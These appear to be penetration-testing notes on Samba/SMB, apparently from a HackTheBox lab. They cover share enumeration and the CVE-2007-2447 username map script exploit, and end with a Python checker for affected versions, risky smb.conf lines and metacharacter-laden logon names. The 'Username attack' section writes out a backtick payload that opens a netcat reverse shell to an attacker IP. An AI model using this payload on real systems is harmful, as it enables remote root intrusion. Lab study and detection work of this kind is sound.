# SMB Samba

## Samba

```
smbclient -L 10.x.x.x       # list shares
smbclient -H 10.x.x.x       # host detail
rpcclient -U "" 10.x.x.x    # null login attempt

smbclient //10.x.x.x/ADMIN$
smbclient //10.x.x.x/MyShare -U bob
```

## Username attack

```
> nc -nvlp 1234   # listener

# Send shell metacharacters into the username with a reverse shell payload.
> logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
> whoami   # root!
```

## Samba usermap script

* Find Samba 3.0.20 with nmap
* Look up Samba exploits: CVE-2007-2447
* `searchsploit samba 3.0.20`
* Google/download: **usermap\_script.py**
* REF: LameHTB

```
> nc -nvlp 4444   # listener
> python2 usermap_script.py -h
> python2 usermap_script.py rhost 445 lhost 4444
> whoami   # root!
```
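The defensive counterpart to the username attack and the usermap script exploit above, as an added example (not part of the original notes and not Samba's own code): it checks a version banner against the range affected by CVE-2007-2447 (Samba 3.0.0 through 3.0.25rc3), finds active `username map script` settings in an smb.conf, and flags logon names carrying shell metacharacters. The sample config, host names and user names are constructed for illustration.

```python
import re

# Characters/sequences with no place in an SMB account name. A bare "$" and
# "\" are left out: machine accounts end in "$" and DOMAIN\user uses "\".
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")
VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)((?:rc|pre)\d+)?")

def version_affected(banner):
    """True for Samba 3.0.0 through 3.0.25rc3; None if no version is found."""
    m = VERSION.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    if (major, minor) != (3, 0):
        return False
    # 3.0.25preN / 3.0.25rcN predate the fixed 3.0.25 release.
    return patch < 25 or (patch == 25 and m.group(4) is not None)

def usermap_script_lines(conf_text):
    """Return (line_no, value) for every active 'username map script' line."""
    hits = []
    for no, line in enumerate(conf_text.splitlines(), 1):
        line = line.strip()
        if not line or line[0] in "#;[" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        # smb.conf parameter names ignore case and whitespace.
        if re.sub(r"\s+", "", key).lower() == "usernamemapscript":
            hits.append((no, value.strip()))
    return hits

def suspicious_username(name):
    """True if a logon name carries shell metacharacters."""
    return bool(SHELL_META.search(name))

# Constructed sample input (hypothetical paths and account names).
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""
SAMPLE_NAMES = ["bob", "WORKGROUP\\alice", "FILESRV01$", "/=`nohup id`"]

if __name__ == "__main__":
    print("affected:", version_affected("Samba smbd 3.0.20-Debian"))
    print("usermap script:", usermap_script_lines(SAMPLE_CONF))
    print("flagged names:", [n for n in SAMPLE_NAMES if suspicious_username(n)])
```

A host is exposed only when both conditions hold: an affected version and an active `username map script` line. Removing that line or upgrading to 3.0.25 or later closes the issue.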

### Python2

```
# python3 didn't work
# Use python2, pip2, and pysmb
# Error seen: ImportError: No module named smb.SMBConnection

> python2 --version   # 2.7.18
# The default get-pip.py no longer runs on Python 2.7; use the 2.7-specific script.
> wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
> sudo python2.7 get-pip.py
> which pip2.7   # /usr/local/bin/pip2.7
> pip2.7 install pysmb
```

## REF:

* [EternalBlue](https://pentest.mxhx.org/03-getting-in/eternal-blue)
